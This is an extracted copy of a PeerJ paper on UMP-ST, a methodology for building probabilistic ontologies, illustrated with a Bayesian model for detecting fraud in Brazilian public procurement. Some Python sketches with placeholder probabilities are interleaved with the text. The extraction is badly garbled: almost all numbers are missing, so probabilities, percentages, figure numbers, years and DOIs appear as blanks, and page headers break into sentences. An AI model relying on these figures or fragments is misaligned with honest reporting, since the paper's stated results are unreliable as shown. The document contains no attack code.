an uncertain attribute of an entity or an uncertain relationship among entities is represented in mebn by a random variable (rv). for example, the rv livesat(person) corresponds carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure creating a rv in pr-owl plug-in from its owl property by drag-and-drop. to the relation livesat from fig. . as it is a functional relation, livesat relates a person to an address. hence, the possible values (or states) of this rv are instances of address. to define a probability distribution for an uncertain attribute or relationship, we must declare it as resident in some mfrag. this occurs as part of i. in fig. ; its probability distribution will be defined later as part of i. . for example, fig. shows how to define uncertainty about whether two persons are related. this is accomplished by selecting the owl property isrelated and dragging the property and dropping it inside the personalinfo mfrag. the mfrags are language specific groupings formed out of the grouping performed during the analysis & design discipline (ad. from fig. ). the yellow oval on the right-hand side of fig. shows the rv defined by the pr-owl plug-in for unbbayes (matsumoto, ) to represent uncertainty about whether persons are related. in the background what actually happens is that an instance of the domainresidentnode class, which is a random variable that has its probability distribution defined in the current mfrag, is created. in addition, an assertion is also added saying that this instance definesuncertaintyof the owl property isrelated. once rvs have been created for all uncertain attributes and relationships, probabilistic dependencies can be identified by analyzing how the rvs influence each other. the rules defined as part of the analysis & design discipline describe probabilistic relationships that are formally defined as part of the implementation discipline. for example, rule indicates that there is a dependence between hascriminalhistory(person), hasadministrativehistory(person), and hascleanhistory(person). carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. a more sophisticated model for deciding whether to do further investigation or change the committee would define a utility function and use expected utility to make the decision. future versions of unbbayes will support multi-entity influence diagrams (costa, ) for modeling decision-making under uncertainty. maybe a better name for this node would be istrustworthy. nevertheless, the idea is that if someone was investigated and/or convicted then he might not be a good candidate for being part of a procurement committee. figure part of the probabilistic ontology for fraud detection and prevention in public procurements. for this paper, we focus on the judgment history, improper committee, and improper procurement mfrags. figure shows a partial mtheory consisting of these three mfrags. details on the complete pr-owl mtheory can be found in carvalho ( ) and are provided as supplemental information. each mfrag defines local probability distributions (lpds) for its resident rvs, shown as yellow ovals. these distributions are conditioned on satisfaction of constraints expressed by context rvs, shown as green pentagons. the local distributions may depend on the values of input rvs, shown as gray trapezoids, whose distributions are defined in the mfrags in which they are resident. 
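one way to picture the outcome of this step is as simple bookkeeping: each resident rv records the owl property whose uncertainty it defines and, once the rules have been analyzed, the parent rvs it depends on. the sketch below is illustrative only (the field names are ours) and records the dependence implied by rule 4.

```python
# illustrative sketch: bookkeeping produced by the rv-creation step. each resident rv
# notes the owl property it defines uncertainty of and, after rule analysis, the
# parent rvs it depends on (here, the dependence implied by rule 4).
RESIDENT_RVS = {
    "hasCleanHistory(person)": {
        "defines_uncertainty_of": "hasCleanHistory",   # owl property
        "mfrag": "JudgmentHistory",
        "parents": ["hasCriminalHistory(person)", "hasAdministrativeHistory(person)"],
    },
    "isRelated(person1, person2)": {
        "defines_uncertainty_of": "isRelated",
        "mfrag": "PersonalInfo",
        "parents": [],
    },
}

for rv, info in RESIDENT_RVS.items():
    print(rv, "<-", info["parents"] or "(no parents: root rv)")
```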
the two main goals described in our requirements are defined in the improper procurement and improper committee mfrags. the judgment history mfrag has rvs representing the judgment (criminal and administrative) history of a person. there are three lpds defined in the judgment history mfrag: (1) a probability that a person has a criminal history; (2) a probability that a person has an administrative history; and (3) a probability that a person has a clean history given whether or not that person has a criminal and/or an administrative history. the corresponding probability that a person does not have a clean history is lowest if he/she has never been investigated, higher if he/she has been investigated, and extremely high if he/she has been convicted. the improper committee mfrag contains the resident rv hasimpropercommittee(procurement), defined under the context constraints that procurement is an entity of type procurement, member is an entity of type person, and member is a member of the committee for procurement. the assumptions behind the lpd defined in this mfrag are that: if any committee member of this procurement does not have a clean history, or if any committee member was related to previous participants, then the committee is more likely to be improper; and if these things happen together, the probability of an improper committee is even higher. the improper procurement mfrag has the resident rv isimproperprocurement(procurement), created in the same way as the isrelated rv inside the personalinfo mfrag explained previously. the assumptions behind the lpd defined in this mfrag are that: if the competition is compromised, or if any owner of a participating enterprise owns a suspended enterprise, or if the committee of this procurement is improper, then the procurement is more likely to be improper; and if these things happen together, the probability of having an improper procurement is even higher. the final step in constructing a probabilistic ontology in unbbayes is to define the lpds for all resident rvs (i. in fig. ). figure shows the lpd for the resident node isimproperprocurement(procurement), which is the main question we need to answer in order to achieve one of the main goals in our model. this distribution follows the unbbayes-mebn grammar for defining lpds (carvalho, ; carvalho et al., ). the distribution for isimproperprocurement depends on the values of the parent rvs iscompetitioncompromised, hasimpropercommittee and ownssuspendedenterprise. the lpd is defined through a series of if-then-else statements giving the probability of isimproperprocurement for each combination of truth-values of its parents. in this example, if all three parent rvs are true, then isimproperprocurement has probability . ; if any two parents are true, then it has probability . ; if just one parent is true, then it has probability . ; if none of the parents is true, then it has probability . . the probability values shown here were defined in collaboration with the specialist who supported the case study. in general, probability values for the mfrags are defined through some combination of expert elicitation and learning from data.
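the shape of that if-then-else distribution can be paraphrased in ordinary code. the sketch below is illustrative only: the numeric values are placeholders chosen merely to respect the ordering implied by the text, not the elicited values shown in the figure, and the actual lpd is written in the unbbayes-mebn grammar rather than python.

```python
# illustrative sketch of the if-then-else style lpd for isImproperProcurement.
# all probability values below are placeholders, not the elicited values from the
# case study; only the ordering (more true parents -> higher probability) is intended.
def p_is_improper_procurement(is_competition_compromised,
                              has_improper_committee,
                              owns_suspended_enterprise):
    """probability that the procurement is improper, given its three parent rvs."""
    true_parents = sum([is_competition_compromised,
                        has_improper_committee,
                        owns_suspended_enterprise])
    if true_parents == 3:
        return 0.99   # placeholder: all three indicators present
    elif true_parents == 2:
        return 0.90   # placeholder: any two indicators present
    elif true_parents == 1:
        return 0.70   # placeholder: a single indicator present
    else:
        return 0.01   # placeholder: no indicator present


print(p_is_improper_procurement(True, False, True))   # -> 0.9
```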
however, in the po described in this paper, all lpds were defined based on the experience of the smes from cgu, since there is not enough structured data to learn the distributions automatically. it is important to ensure traceability between the mfrags defined in the implementation stage and the rules defined in the analysis & design stage. a traceability matrix similar to table was developed to trace mfrags to rules. this mapping, along with the mapping of the rules to the requirements as documented in table , enables the probabilistic relationships expressed in the mfrags to be traced back to the requirements defined in the goals stage. test as with any engineering methodology, test (t. in fig. ) plays an essential role in ump-st. as laskey & mahoney ( ) point out, test should do more than showcase the model and carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure lpd for node isimproperprocurement(procurement). demonstrate that it works as envisioned. another important goal of the test discipline is to find flaws and areas for improvement in the model. the literature distinguishes two types of evaluation, verification and validation (adelman, ). verification is concerned with establishing that ‘‘the system was built right,’’ i.e., that the system elements conform to their defined performance specifications. validation is concerned with establishing that the ‘‘right system was built,’’ i.e., that it achieves its intended use in its operational environment. for example, in the model we have been describing in this section we would like to verify that the system satisfies the non-functional requirements developed during the requirements stage as described above, e.g., that the queries covered by the requirement are answered in less than a minute and that the posterior probability given as an answer to a given query is either exact or has an approximation with an error bound of . % or less. laskey & mahoney ( ) present three types of evaluation: elicitation review, importance analysis, and case-based evaluation. elicitation review includes reviewing the model documentation, analyzing whether all the requirements were addressed in the final model, making sure all the rules defined during the analysis & design stage were implemented, validating the semantics of the concepts carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. described by the model, etc. this is an important step towards achieving consistency in our model, especially if it was designed by more than one expert. elicitation review can also confirm that the rules as defined correctly reflect stakeholder requirements. the traceability matrices are a useful tool for verifying whether all the requirements were addressed in the final implementation of the model. by looking at the matrix tracing mfrags to rules, we can verify that all the rules defined during analysis & design have been covered. the traceability matrix of table , defined during analysis & design, ensured that the rules covered all the defined requirements. therefore, by composing these matrices, we can infer that all the requirements have been implemented in our model. this review should also confirm that important stakeholder requirements were not missed during analysis & design. 
of course, an initial implementation will often intentionally cover only a subset of the stakeholder requirements, with additional requirements being postponed for later versions. lessons learned during implementation are reviewed at this stage and priorities for future iterations are revisited and revised. importance analysis is a model validation technique described by laskey & mahoney ( ). a form of sensitivity analysis, its purpose is to verify that selected parts of the model behave as intended. in importance analysis, one or more focus rvs are specified and their behavior is examined under different combinations of values for evidence rvs. the output is a plot for each focus rv that orders the evidence rvs by how much changes in the value of the evidence rv affect the probability of the focus rv. importance analysis is an important type of unit testing. in the case of pr-owl, we can analyze the behavior of the random variables of interest given evidence per mfrag. this mfrag testing is important to capture local consistency of the model and to help localize the source of any problems identified in the model. the tests designed in this section as well as the model described in this paper were developed with the help of experts from the department of research and strategic information from cgu. they provided detailed information on the different types of frauds as well as on evidence that they usually search for when auditing contracts during the internal control activities. furthermore, they have also validated the proof-of-concept model described in this paper with the tests we will describe as well as others that were omitted due to space restrictions. as an example of unit testing, we demonstrate how to define different scenarios to test the judgment history mfrag. essentially, we want to verify how the query hascleanhistory(person) will behave in light of different sets of evidence for a person's criminal and administrative history. results for just one combination of states for the parent rvs are shown in fig. , which shows three distinct scenarios for a -node model. the model assesses whether or not a given person (person in the figure) has a clean history. it consists of a binary rv with two parents. each parent represents whether or not the person has been convicted, investigated, or not investigated in a criminal process (hascriminalhistory__person ) or in an administrative process (hasadministrativehistory__person ). figure : results of unit testing for the judgment history mfrag. figure a shows the model with no evidence entered (all nodes in yellow with non-zero probabilities), which results in a marginal "a priori" probability of . % that any given person would not have a clean history. figure b shows the model results when knowledge about neverinvestigated is entered in the hascriminalhistory_person rv (the hascriminalhistory__person node is colored in gray to show that it is observed). this causes a slight reduction in the belief that person does not have a clean history (down from . % to . %). finally, fig. c shows the model's results when evidence on person having a criminal conviction and never being investigated on an administrative process are entered (both parents now shown in gray with % probability on the observed value). a systematic unit test would examine other combinations as well (carvalho, ).
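the sketch below mirrors this three-node unit test in plain python by enumerating the parent states and computing the posterior probability that the person does not have a clean history under different evidence. the state names follow the text, but the prior and conditional probability values are placeholders, since the elicited numbers are not reproduced here.

```python
import itertools

STATES = ["NeverInvestigated", "Investigated", "Convicted"]
# placeholder priors and conditional values (the elicited numbers are not reproduced here).
p_criminal = {"NeverInvestigated": 0.90, "Investigated": 0.08, "Convicted": 0.02}
p_admin    = {"NeverInvestigated": 0.85, "Investigated": 0.12, "Convicted": 0.03}

def p_not_clean(criminal, admin):
    """P(hasCleanHistory = false | parents); grows with the severity of either history."""
    score = {"NeverInvestigated": 0.0, "Investigated": 0.4, "Convicted": 0.9}
    return min(0.99, 0.01 + max(score[criminal], score[admin]))

def posterior_not_clean(evidence=None):
    """enumerate parent states consistent with the evidence and marginalize."""
    evidence = evidence or {}
    num = den = 0.0
    for c, a in itertools.product(STATES, STATES):
        if evidence.get("criminal", c) != c or evidence.get("admin", a) != a:
            continue
        w = p_criminal[c] * p_admin[a]
        num += w * p_not_clean(c, a)
        den += w
    return num / den

print(posterior_not_clean())                                   # no evidence entered
print(posterior_not_clean({"criminal": "NeverInvestigated"}))  # scenario (b)
print(posterior_not_clean({"criminal": "Convicted",
                           "admin": "NeverInvestigated"}))     # scenario (c)
```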
it is important that unit testing achieve as much coverage as possible, and that results be analyzed by verifying that posterior probabilities behave as expected. in our case, the posterior probabilities are consistent with the expected result as defined by the expert. case-based evaluation is conducted by defining a range of different scenarios and examining the results produced by the system for each of the scenarios. case-based evaluation is a system level test appropriate for integration testing. for our procurement po, we define scenarios with evidence represented in different mfrags. this means that each query response will require instantiating multiple parts of the model, helping to validate how the model works as a whole. this validation is important to whether the model’s global performance matches the specialist’s knowledge. it is important to try out different scenarios in order to capture the nuances of the model. in fact, it is a good practice to design the scenarios in order to cover the range of requirements the model must satisfy (wiegers, ; sommerville, ). although it is impossible to cover every scenario we might encounter, we should aim for good coverage, and especially look for important ‘‘edge cases.’’ a traceability matrix relating unit tests and case-based evaluation scenarios to mfrags is a useful tool to ensure that test scenarios have achieved sufficient coverage. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the ssbn generated for this scenario is shown in carvalho ( ), provided as supplemental information. keeping in mind the need to evaluate a range of requirements, we illustrate case-based evaluation with three qualitatively different scenarios. the first one concerns a regular procurement with no evidence to support the hypothesis of an improper procurement or committee. the second one has conflicting evidence in the sense that some supports the hypothesis of having an improper procurement or committee but some does not. finally, in the third scenario there is overwhelming evidence supporting the hypothesis of an improper procurement or committee. when defining a scenario, it is important to define the hypothesis being tested and what is the expected result, besides providing the evidence which will be used. table presents a comparison between all three scenarios. it can be seen that the difference between the first and the second scenarios is that member was never investigated administratively in the first scenario, but was in the second. in the third scenario, however, besides having the evidence that member was investigated, we also have the evidence that person and live at the same address and that person lives at the same address as member . in the first scenario, we expect that procurement will not be deemed improper since the members of the committee have never been investigated in either administrative or criminal instances and we have no relevant information about the owners of the enterprises participating in the procurement. when the query is presented to the system, the needed mfrags are retrieved and instantiated for the entities relevant to the scenario, resulting in an ssbn that answers the query. figure shows part of the ssbn generated from scenario . evidence includes the fact that member , who in this ssbn is part of the procurement process being assessed, has never been investigated in either an administrative process or in a criminal process. 
as expected, the probabilities of both isimproperprocurement(procurement ) = true and isimpropercommittee(procurement ) = true are low, . % and . %, respectively. in other words, the procurement is unlikely to be improper given the evidence entered so far. in the second scenario, one of the three members of the committee was previously investigated in the administrative instance. all other evidence is the same as in the previous scenario. we expect that this new piece of evidence should not be strong enough to make the procurement improper, although the probability of being improper should be higher than in the first scenario. the results of inference are as expected. the probabilities of isimproperprocurement(procurement ) = true and isimpropercommittee(procurement ) = true are . % and . %, respectively. in other words, the probability increased but it is still relatively unlikely. however, depending on the stringency of the threshold, this case might be flagged as warranting additional attention. finally, in the third scenario, we have evidence that the owners of two different enterprises participating in the procurement process live at the same address. since there are only three enterprises participating in the procurement, the competition requirement is compromised. thus, the procurement is likely to be improper.

table : comparison of all three scenarios.

evidence applying to all scenarios:
hascriminalhistory(member ) = neverinvestigated
hasprocurementowner(procurement ) = agency
ismemberofcommittee(member , procurement ) = true
ismemberofcommittee(member , procurement ) = true
ismemberofcommittee(member , procurement ) = true
isparticipantin(enterprise , procurement ) = true
isparticipantin(enterprise , procurement ) = true
isparticipantin(enterprise , procurement ) = true
isprocurementfinished(procurement ) = false
isresponsiblefor(person , enterprise ) = true
isresponsiblefor(person , enterprise ) = true
isresponsiblefor(person , enterprise ) = true

scenario :
hypothesis and expected result: low probability that isimproperprocurement(procurement ) = true; low probability that isimpropercommittee(procurement ) = true.
evidence unique to this scenario: hasadministrativehistory(member ) = neverinvestigated.
result: . % that isimproperprocurement(procurement ) = true; . % that isimpropercommittee(procurement ) = true.

scenario :
hypothesis and expected result: probability that isimproperprocurement(procurement ) = true between % and %; probability that isimpropercommittee(procurement ) = true between % and %.
evidence unique to this scenario: hasadministrativehistory(member ) = investigated.
result: . % that isimproperprocurement(procurement ) = true; . % that isimpropercommittee(procurement ) = true.

scenario :
hypothesis and expected result: probability that isimproperprocurement(procurement ) = true greater than %; probability that isimpropercommittee(procurement ) = true between % and %.
evidence unique to this scenario: hasadministrativehistory(member ) = investigated; livesatsameaddress(person , person ); livesatsameaddress(person , member ).
result: . % that isimproperprocurement(procurement ) = true; . % that isimpropercommittee(procurement ) = true.

the ssbn generated for this scenario is shown in carvalho ( ), provided as supplemental information. figure : part of the ssbn generated for the first scenario.
as expected, the probability of isimproperprocurement(procurement ) = true and isimpropercommittee(procurement ) = true are much larger, at . % and . %, respectively. notice that although the probability of having an improper procurement correctly increased to a value greater than %, the probability of having an improper committee has not changed, since there is no new evidence supporting this hypothesis. the cases presented here are meant to illustrate the ump-st. a full case-based evaluation would consider a broad range of cases with good coverage of the intended use of the model. applicability of ump-st to other domains in this paper, we focused on the fraud identification use case as a means to illustrate the core ideas of the ump-st. we chose this use case because its applicability was clear and its benefits have been independently tested (the methodology is currently being evaluated for use by the brazilian office of the comptroller general). nevertheless, the methodology is applicable to any problem requiring the development of a probabilistic ontology. other examples of using the technique can be found in the terrorist identification domain (haberlin, costa & laskey, ) and the maritime situation awareness (mda) domain (haberlin, ; carvalho et al., ). for instance, the latter involved the development of a probabilistic ontology as part of the prognos (probabilistic ontologies for net-centric operation systems) project (costa, laskey & chang, ; carvalho et al., ), in which pr-owl was chosen as the ontology language due to its comprehensive treatment of uncertainty, use of a highly expressive first-order bayesian language, and compatibility with owl. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supplemental-information https://peerj.com http://dx.doi.org/ . /peerj-cs. the mda probabilistic ontology is designed for the problem of identifying whether a given vessel is a ship of interest. the probabilistic ontology was written in pr-owl, and its development employed the ump-st process. an important aspect is that the development of the pr-owl ontology was initially based on an existing ontology of western european warships that identifies the major characteristics of each combatant class through the attributes of size, sensors, weapons, missions, and nationality. thus, its development was a good case study for applying ump-st to extend an existing ontology to incorporate uncertainty. during its development, the mda ontology was evaluated for face validity with the help of semantic technology experts with knowledge of the maritime domain. this evaluation effort had issues in getting feedback from a sufficiently large number of experts, but the overall result of the evaluation suggests the ump-st not only as viable and applicable to the problem it supports but also a promising approach for using semantic technology in complex domains (haberlin, ). more recently, alencar ( ) applied the ump-st process to create a po for supporting the decision of whether or not to proceed with live data forensic acquisition. besides using the ump-st, several tools and techniques shown in this paper were also applied: the use of uml class diagrams to identify the main entities, attributes, and relations for the model; the use of a traceability matrix to facilitate further improvements in the model; the implementation of the po using pr-owl and unbbayes; and the validation of the model using both unit testing and case-based evaluation. 
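the sketch below illustrates how such case-based evaluation scenarios can be organized as an automated, integration-style test harness: each scenario bundles a hypothesis, its evidence, and an expected probability range, and the harness checks the inference result against that range. the scenario contents, entity identifiers, expected ranges, and the dummy inference function are placeholders; they stand in for the actual cgu test suite and the unbbayes ssbn query.

```python
# illustrative integration-test harness for case-based evaluation.
# scenario contents and expected probability ranges are placeholders.
scenarios = [
    {"name": "regular procurement",
     "evidence": {"hasAdministrativeHistory(member1)": "NeverInvestigated"},
     "query": "isImproperProcurement(procurement1)",
     "expected_range": (0.0, 0.10)},
    {"name": "conflicting evidence",
     "evidence": {"hasAdministrativeHistory(member1)": "Investigated"},
     "query": "isImproperProcurement(procurement1)",
     "expected_range": (0.10, 0.50)},
    {"name": "overwhelming evidence",
     "evidence": {"hasAdministrativeHistory(member1)": "Investigated",
                  "livesAtSameAddress(person1, person2)": True},
     "query": "isImproperProcurement(procurement1)",
     "expected_range": (0.50, 1.0)},
]

def run_case_based_evaluation(infer):
    """`infer(query, evidence)` wraps whatever ssbn inference engine is used."""
    for s in scenarios:
        p = infer(s["query"], s["evidence"])
        lo, hi = s["expected_range"]
        status = "PASS" if lo <= p <= hi else "FAIL"
        print(f"{status} {s['name']}: P({s['query']} = true) = {p:.3f}")

def dummy_infer(query, evidence):
    # stand-in for the real ssbn query, for demonstration only.
    return 0.05 + 0.3 * sum(v == "Investigated" or v is True for v in evidence.values())

run_case_based_evaluation(dummy_infer)
```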
future work a natural next step in this research is the development of automated tools to support the ump-st. it is useful to have a tool to guide the user through the steps necessary to create a probabilistic ontology and link this documentation to its implementation in the unbbayes pr-owl plug-in. a tool to support this documentation process has been developed by the group of artificial intelligence (gia, grupo de inteligência artificial, in portuguese) from the universidade de brasília, brazil (de souza, ; santos et al., ; carvalho et al., ). penetration of semantic technology into serious applications cannot rely only on hand- engineered ontologies. there has been a robust literature on ontology learning (hazman, r. el-beltagy & rafea, ) and learning of expressive probabilistic representations (getoor & taskar, ; de raedt, ; luna, revoredo & cozman, ), and there is robust research activity on the topic. the probability specification step of the pomc could combine both expert-specified probability distributions and probability distributions learned from data. practicing ontology engineers and the semantic technology community would benefit from widely available ontological engineering tools that support ump-st, provide scalable inference and support learning. in addition, there are other disciplines not discussed in this paper that are essential for practical ontology engineering, such as configuration management and user experience design. further, the ump-st process would benefit carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. from a more detailed description of the activities performed, roles involved, and artifacts produced in its application. the eclipse process framework (epf) could be employed to provide a structured way to present the disciplines, activities, best practices, roles, etc. as customizable software process engineering framework, epf has two major goals (eclipse foundation, ): • ‘‘to provide an extensible framework and exemplary tools for software process engineering - method and process authoring, library management, configuring and publishing a process.’’ • ‘‘to provide exemplary and extensible process content for a range of software development and management processes supporting iterative, agile, and incremental development, and applicable to a broad set of development platforms and applications’’. capturing ump-st within epf will provide guidance and tools to a broad community of developers for following the ump-st to develop probabilistic ontologies. a process that is made freely available with the epf framework is the openup (balduino, ) which is a minimally sufficient software development process. this process could be used as a starting point to describe the ump-st process, since openup is extensible to be used as foundation on which process content can be added or tailored as needed. two major challenges must be addressed to enable broad use of semantically rich uncertainty management methods. the first is scalability. there have been some attempts to grapple with the inherent scalability challenges of reasoning with highly expressive probabilistic logics. for example, lifted inference (braz, amir & roth, ) exploits repeated structure in a grounded model to avoid unnecessary repetition of computation. approximate inference methods such as mc-sat and lazy inference (domingos & lowd, ) have been applied to inference in markov logic networks. 
hypothesis management methods (haberlin, costa & laskey, a; haberlin, costa & laskey, b; laskey, mahoney & wright, ) can help to control the complexity of the constructed ground network. much work remains on developing scalable algorithms for particular classes of problems and integrating such algorithms into ontology engineering tools. finally, ontologies generated using the ump-st process would greatly benefit from methods that can assess how well and comprehensively the main aspects of uncertainty representation and reasoning are addressed. thus, a natural path in further developing the ump-st is to leverage ongoing work in this area, such as the uncertainty representation and reasoning evaluation framework (urref) (costa et al., ; de villiers et al., ) developed by the international society of information fusion’s working group on evaluation of techniques for uncertainty reasoning (eturwg). we are already participating in this effort and plan to leverage its results in the near future. conclusion the uncertainty modeling process for semantic technology (ump-st) addresses an unmet need for a probabilistic ontology modeling methodology. while there is extensive literature on both probability elicitation and ontology engineering, these fields have developed nearly independently and there is little literature on how to bring them together carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. to define a semantically rich domain model that captures relevant uncertainties. such expressive probabilistic representations are important for a wide range of domains. there is a robust literature emerging on languages for capturing the requisite knowledge. however, modelers can as yet find little guidance on how to build these kinds of semantically rich probabilistic models. this paper provides such a methodology. ump-st was described and illustrated with a use case on identifying fraud in public procurement in brazil. the use case was presented with a focus on illustrating the activities that must be executed within each discipline in the pomc cycle in the context of the fraud identification problem. the core concepts in applying ump-st to the procurement domain can easily be migrated to completely distinct domains. for instance, it was also used in defining a po for maritime domain awareness (mda) (carvalho, ) which supports the identification of terrorist threats and other suspicious activities in the maritime domain. the mda po evolved through several versions, showing how the ump-st process supports iterative model evolution and enhancement. acknowledgements the authors would like to thank the brazilian office of the comptroller general for their active support since and for providing the human resources necessary to conduct this research. more specifically, the authors would like to thank the department of research and strategic information for providing the experts who explained the fraud domain in detail and provided help on creating and validating the use case described. the authors would also like to thank dr. marcelo ladeira and his students from the universidade de brasília for their work on developing the unbbayes probabilistic network framework, and for providing support to this research as needed. additional information and declarations funding this research was partially supported by the office of naval research (onr), under contract #n - -c- . 
the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: office of naval research (onr): #n - -c- . competing interests kathryn b. laskey is an academic editor for peerj computer science. the authors declare there are no other competing interests. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. author contributions • rommel n. carvalho conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • kathryn b. laskey conceived and designed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper, supervised software development, supervised research, directed dr. carvalho’s phd dissertation. • paulo c.g. da costa conceived and designed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper, supervised software development, served on dr. carvalho’s phd committee. data availability the following information was supplied regarding data availability: the probabilistic ontology tool is available for download from http://sourceforge.net/ projects/unbbayes/. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references adelman l. . evaluating decision support and expert systems. st edition. new york: john wiley & sons, incorporated. alencar db. . use of probabilistic ontologies and multi-entity bayesian networks for defining, modelling, guiding and aiding decision-making forensic processes. m.sc. thesis, forensic computing and cyber crime investigation, university college dublin, dublin, ireland. allemang d, hendler ja. . semantic web for the working ontologist. nd edition. burlington: morgan kaufmann. balduino r. . introduction to openup (open unified process). technical report. the eclipse foundation, ottawa. braz r, amir e, roth d. . lifted first-order probabilistic inference. in: introduction to statistical relational learning. cambridge: mit press. burgman m, fidler f, mcbride m, walshe t, wintle b. . eliciting expert judgments: literature review. technical report. australian centre for excellence in risk analysis (acera), melbourne. carvalho rn. . plausible reasoning in the semantic web using multi-entity bayesian networks—mebn. m.sc. thesis, university of brasilia, brasilia, brazil. carvalho rn. . probabilistic ontology: representation and modeling methodology. phd thesis, george mason university, fairfax, va, usa. carvalho rn, costa pc, laskey kb, chang k. . prognos: predictive situational awareness with probabilistic ontologies. in: proceedings of the th international conference on information fusion. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://sourceforge.net/projects/unbbayes/ http://sourceforge.net/projects/unbbayes/ http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. carvalho rn, dos santos ll, ladeira m, da rocha ha, mendes gl. . ump-st plug-in: documenting, maintaining and evolving probabilistic ontologies using unbbayes framework. in: uncertainty reasoning for the semantic web iii. new york: springer international publishing, – . 
carvalho rn, haberlin r, costa pc, laskey kb, chang k. . modeling a probabilis- tic ontology for maritime domain awareness. in: proceedings of the th international conference on information fusion. carvalho rn, ladeira m, santos l, matsumoto s, costa pc. . unbbayes-mebn: comments on implementing a probabilistic ontology tool. in: guimarães n, isaías p, eds. proceedings of the iadis international conference applied computing . algarve: iadis, – . carvalho rn, ladeira m, santos ll, matsumoto s, costa pc. . a gui tool for plausible reasoning in the semantic web using mebn. in: nedjah n, mourelle lm, kacprzyk j, eds. innovative applications in data mining, studies in computational intelligence, vol. . new york: springer, – . carvalho rn, laskey kb, costa pc. . pr-owl . –bridging the gap to owl semantics. in: bobillo f, costa pc, d’amato c, fanizzi n, laskey kb, laske kj, lukasiewicz t, nickles m, pool m, eds. uncertainty reasoning for the semantic web ii. number in lecture notes in computer science. berlin heidelberg: springer, – . clemen rt, reilly t. . making hard decisions with decision tools suite update edition. st edition. pacific grove: cengage learning. costa pc. . bayesian semantics for the semantic web. phd thesis, george mason university, fairfax, va, usa. costa pc, laskey kb, blasch e, jousselme a-l. . towards unbiased evaluation of uncertainty reasoning: the urref ontology. in: proceedings of the fifteenth international conference on information fusion, singapore. piscataway: ieee. costa pc, laskey kb, chang k. . prognos: applying probabilistic ontologies to distributed predictive situation assessment in naval operations. in: proceedings of the fourteenth international command and control research and technology symposium (iccrts ). costa pc, laskey kb, laskey kj. . pr-owl: a bayesian framework for the semantic web. in: proceedings of the first workshop on uncertainty reasoning for the semantic web (ursw ). costa pc, laskey kb, laskey kj. . pr-owl: a bayesian ontology language for the semantic web. in: uncertainty reasoning for the semantic web i: iswc international workshops, ursw – , revised selected and invited papers. berlin: springer- verlag, – . cozman fg, maua dd. . specifying probabilistic relational models with description logics. in: proceedings of the xii encontro nacional de inteligência artificial e computa- cional (eniac). natal, rn, brazil. de hoog r. . methodologies for building knowledge based systems: achievements and prospects. in: liebowitz j, ed. handbook of applied expert systems. chapter . boca raton: crc press. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. de raedt l. . advances in inductive logic programming. fairfax: ios press. de souza rm. . unbbayes plug-in for documenting probabilistic ontologies using ump-st. b.s. thesis, university of brasilia, brasilia, brazil. de villiers j, laskey kb, jousselme a-l, blasch ep, waal ad, pavlin g, costa pc. . representation, quantification and evaluation for data and information fusion. in: proceedings of the eighteenth international conference on information fusion. piscataway: ieee. dhurandhar a, ettl mr, graves bc, ravi rk. a. system and method for identifying procurement fraud/risk. us patent. no. . dhurandhar a, ravi r, graves b, maniachari g, ettl m. b. robust system for identifying procurement fraud. in: proccedings of the twenty-seventh iaai conference. palo alto: aaai press. ding z, peng y, pan r. . 
bayesowl: uncertainty modeling in semantic web ontologies. in: soft computing in ontologies and semantic web. vol. . berlin / heidelberg: springer, – . domingos p, lowd d. . markov logic: an interface layer for artificial intelligence. st edition. williston: morgan and claypool publishers. druzdzel mj, van der gaag lc. . building probabilistic networks: where do the numbers come from - a guide to the literature, guest editors’ intro- duction. ieee transactions in knowledge and data engineering : – doi . /tkde. . . eclipse foundation. . eclipse process framework project (epf). available at http: //www.eclipse.org/epf/general/description.php. fernández-lópez m, gómez-pérez a, juristo n. . methontology: from ontological art to ontological engineering. in: ontological engineering: papers from the aaai spring symposium. menlo park: aaai press. flores aer. . auditoria y mecanismos anticorrupcion (segunda parte). quipuka- mayoc ( ): – . frizzo h, oliveira pl. . public procurement in brazil: overview. available at http: //us.practicallaw.com/ - - . garthwaite ph, kadane jb, o’hagan a. . statistical methods for eliciting probabil- ity distributions. journal of the american statistical association ( ): – doi . / . gasevic d, djuric d, devedzic v, damjanovi v. . converting uml to owl ontologies. in: proceedings of the th international world wide web conference on alternate track papers & posters. new york: acm, – . getoor l, taskar b. . introduction to statistical relational learning. cambridge: mit press. gomez-perez a, corcho o, fernandez-lopez m. . ontological engineering: with examples from the areas of knowledge management, e-commerce and the semantic web, first edition. new york: springer. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tkde. . http://www.eclipse.org/epf/general/description.php http://www.eclipse.org/epf/general/description.php http://us.practicallaw.com/ - - http://us.practicallaw.com/ - - http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. gotel o, finkelstein c. . an analysis of the requirements traceability problem. in: proceedings of the first international conference on requirements engineering, , – . gregorini a. . auditoria 